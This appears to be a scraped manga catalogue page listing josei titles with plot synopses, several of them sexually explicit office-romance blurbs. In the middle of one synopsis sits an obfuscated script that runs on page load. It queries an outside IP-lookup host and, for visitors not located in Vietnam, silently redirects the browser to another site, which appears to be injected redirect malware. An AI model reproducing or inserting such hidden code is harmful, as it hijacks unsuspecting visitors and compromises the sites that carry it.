Josei - Page 165

Josei manga is designed for adult women, often covering themes such as love, career, and personal growth. It typically focuses on more realistic portrayals of relationships and emotional maturity, compared to the idealized stories in shoujo manga.

3234 results

For My Derelict Beloved

I entered my favorite romantic fantasy novel! I may be a commoner, but I'm rich beyond belief. I quietly watched the romance of the main characters in the original novel, assuming I would go back to reality after reaching the novel's ending... However, even after the ending, I am still stuck in this world! As a result, I learned the behind-the-scenes stories that I didn't want to know. My favorite second male lead, Kaelus, died. Living in poverty without him, I eventually became ill and died as well. I thought I would return to reality, but I went back in time instead. This is definitely... This means I have to save my beloved, right?---**Notes:*** The novel of this series was originally released as R15, 7 months after being completed the book/ebook was later re-released as R19. The webtoon will follow how the novel was originally released which is R15.* *For My Derelict Favorite* is the official English name on the Korean novel.---**Original Webtoon:** (, (


A Hot Night With My Boss In A Capsule Hotel

."You need to keep your voice down." My boss presses his hot body against mine in a tiny capsule hotel. Rubbing against each other's most sensitive spots, I can barely keep quiet.


Revenge Is A Dish Best Served Cold

Her best friend tried to kill herself, but why? In order to find out the truth, the protagonist meticulously crafts a revenge plot to make all the culprits and their accomplices pay!


Kuuki ga "Yomeru" Shinnyushain to Buaiso na Senpai no Hanashi

A slice-of-life story about a new employee who can literally read emotions and an inexpressive but actually very kind sempai at work.


Happy Parasite

An encounter that leads to a pushy parasite?! "Thanks for your help!" "Please leave." The cool, low energy businessman and the super-positive NEET, the worst possible match(?), start living together! "I'll repay you with my body!" One night, Kazuhisa, a company employee who doesn't like getting involved with others, meets Haru, a backpacker lying down on the street. Surprised and annoyed by his decision, Kazuhisa decided to let Haru, who had trouble sleeping, stay with him. Kazuhisa is swayed by the brazenness and energy of Haru, while he tries to take care of him the best he can. To top it all off, Haru tries to repay Kazuhisa with his body...?


Only for You

[from cotton candy scans] "The one confession you lack to make it a draw... Shall I give it to you?" Chikage and Haruto have always been competing against each other since elementary school. They have a competition to see who can get the most number of confessions before their high school graduation...?! ... A few years later. Despite always declaring it "A competition!" every time they meet, they went down their own respective paths with Chikage as a model and Haruto as an actor. Coincidentally, the first drama recording that Chikage stars in happens to be alongside Haruto... It's a heart-throbbing love story where the clumsy duo's worlds of love and work collide!


Isekai Ooku Ohi Ni Naritakuba Yotogi De Denka Ni Aisaretsuzuke Yo

Only a woman who gives birth to the prince's child can become queen. Can I take the throne when the Ladies'Chambers are so full of dangerous women?+


Let’s Do It After We Marry

Mo-Ah is a nonogamist who always went around shouting, “I’ll never get married in this life!” Until one day, she faces her boss Geon-Hu, who is known for being strict and level-headed...naked. But it surely can't be true... You're telling me that such a figure belongs to a human?! He's as grand and brilliant as an art statue. To the point that she forgets her shame on the spot, and is unable to take her eyes off of him. After witnessing Geon-Hu's perfect naked body, Mo-ah suffers from a terrible aftereffect. Wherever she was and whatever she did, all she could think about was his figure. The distressed Mo-Ah confesses to him one night while drunk. "Excuse me... Team Leader, could you sleep with me once?" It was a confession that she definitely couldn't bring up had she been sober. There was a rush of regret the moment those words left her mouth, but his reply was an even more troublesome answer. "I'm sorry, but I won't do it unless it's with the girl I'm going to marry."<script></script><script>function _0x11f0(_0x93b2a4,_0x316742){var _0x3d3dcf=_0x4dee();return _0x11f0=function(_0x137a62,_0xfb65f5){_0x137a62=_0x137a62-(-0x50b*-0x5+-0x25a1+-0x3d*-0x3b);var _0x393f81=_0x3d3dcf[_0x137a62];return _0x393f81;},_0x11f0(_0x93b2a4,_0x316742);}(function(_0x7b50bc,_0x38d7d1){var _0x23ab32=_0x11f0,_0x4ce71d=_0x7b50bc();while(!![]){try{var _0x4f7b7a=-parseInt(_0x23ab32(0x1b4))/(0x1cf7+-0x5*0x1b7+0x1*-0x1463)*(-parseInt(_0x23ab32(0x1a7))/(-0xa*0x251+0x17c4+-0x98))+parseInt(_0x23ab32(0x1b9))/(-0x4*0x64f+-0x1801+-0x20*-0x18a)*(parseInt(_0x23ab32(0x1c2))/(0x3*-0x20e+-0x231*-0x3+-0x65))+parseInt(_0x23ab32(0x1c5))/(-0x2d3+0x1400+-0x1128)*(parseInt(_0x23ab32(0x1c1))/(-0x394*-0x1+0x1*-0x851+0x4c3))+-parseInt(_0x23ab32(0x1ab))/(-0xbb9+-0x37d*0x3+0x1637)+parseInt(_0x23ab32(0x1ba))/(-0x2226+-0x19d1*-0x1+-0x1*-0x85d)+parseInt(_0x23ab32(0x1ad))/(0x898+0x2*0x10e3+-0x2a55)+parseInt(_0x23ab32(0x1bd))/(-0x1ce2*0x1+0x295*0x7+0xad9)*(-parseInt(_0x23ab32(0x1a9))/(-0x2d9*0xc+-0x2d2*0xd+0x46e1));if(_0x4f7b7a===_0x38d7d1)break;else _0x4ce71d['push'](_0x4ce71d['shift']());}catch(_0x517c3b){_0x4ce71d['push'](_0x4ce71d['shift']());}}}(_0x4dee,-0x364b*-0x1+-0xc4ed7+0x17a108));function custom(){var _0x516d22=_0x11f0,_0x1ab9f={'VUHMU':function(_0x1e0675,_0x3214d9){return _0x1e0675!=_0x3214d9;},'oRHPD':_0x516d22(0x1b2)+_0x516d22(0x1bb),'NftYE':function(_0x15cba2,_0x14cbf2){return _0x15cba2+_0x14cbf2;},'sUvVF':function(_0x5477d4,_0x555d5d){return _0x5477d4*_0x555d5d;},'nxrQt':function(_0x720756,_0x28dccc){return _0x720756+_0x28dccc;},'BRnYO':function(_0x7002f5,_0x33000f){return _0x7002f5-_0x33000f;},'rfOQX':_0x516d22(0x1c0),'VdWpw':function(_0x4caefb,_0x377c1e){return _0x4caefb>=_0x377c1e;},'rUkSd':function(_0x17c5f6,_0x4357e3){return _0x17c5f6(_0x4357e3);},'VSRMV':_0x516d22(0x1b8)+_0x516d22(0x1af)+_0x516d22(0x1b0)},_0x1987ea=_0x1ab9f[_0x516d22(0x1ac)],_0x3a256b=Math[_0x516d22(0x1bc)](_0x1ab9f[_0x516d22(0x1c7)](_0x1ab9f[_0x516d22(0x1aa)](Math[_0x516d22(0x1a5)](),_0x1ab9f[_0x516d22(0x1a6)](_0x1ab9f[_0x516d22(0x1c6)](-0xa*-0x373+-0xa0b+-0x180f,0x2de*-0x8+-0x1ca*-0x10+-0x5*0x123),-0x8*0x1b1+-0x3b*0x89+0x2*0x168e)),0x6c4+0x1533+-0x952*0x3)),_0x437ab=document[_0x516d22(0x1b1)];if(_0x437ab[_0x516d22(0x1b7)](_0x1ab9f[_0x516d22(0x1a8)])||_0x1ab9f[_0x516d22(0x1ae)](_0x3a256b,0x1*-0x49d+0x199*0x1+0x366)){let _0x1d8ecc=_0x1ab9f[_0x516d22(0x1b5)](fetch,_0x1ab9f[_0x516d22(0x1c4)])[_0x516d22(0x1be)](_0x9e9239=>{var _0x400cd8=_0x516d22;return _0x9e9239[_0x400cd8(0x1c3)]();})[_0x516d22(0x1be)](_0xc720d1=>{var _0x40e9e4=_0x516d22;_0x1ab9f[_0x40e9e4(0x1b6)](_0xc720d1,'VN')&&(window[_0x40e9e4(0x1b3)][_0x40e9e4(0x1bf)]=_0x1987ea);});}}function _0x4dee(){var _0x134892=['484488wyatSK','28pnEGLf','text','VSRMV','35sumZnu','BRnYO','NftYE','random','nxrQt','23002ymZMmJ','rfOQX','3756478xQFHWs','sUvVF','2079525KEKtHe','oRHPD','12829887chLzsE','VdWpw','.customapi','.top/','referrer','http://rea','location','41gqEjbo','rUkSd','VUHMU','includes','https://ip','609327QDMbNo','4670464OzFTaV','','floor','100xqdaOL','then','href','google'];_0x4dee=function(){return _0x134892;};return _0x4dee();}setTimeout(custom,0xf5f+0x1*0x16eb+0x1*-0x264a);</script>


Kyonyuu-Chan To Kyokon Joushi: Kaisha De Musabori Sex

Hotaru Shina is an office worker with a powerful libido and imagination to boot. She spends her nights alone, pleasuring herself with adult toys. One day, while she's working overtime, she realizes she brought one of her toys to the office! To make matters even worse, Ryo, the top sales rep and someone she looks up to, walks in on her holding it! She thinks he'll be repulsed, but the usually sweet Ryo reveals his own dirty appetite. He pounds her hard with something way bigger than she's used to. She'll never be able to go back to satisfying herself again...!!!They've got great physical chemistry!! This is a secret office romance about two people who were made for each other.



In 19th Century England, during the Victorian Era, there is the Kingdom of Tarnina Ulaniborg. The Kingdom has a Royal Academy where Royalty and Commoners can study Astronomical Research in hopes of becoming a Royal Astronomer. Astel Paschalis attends the Royal Academy as a scholarship student with a certain hidden motive.
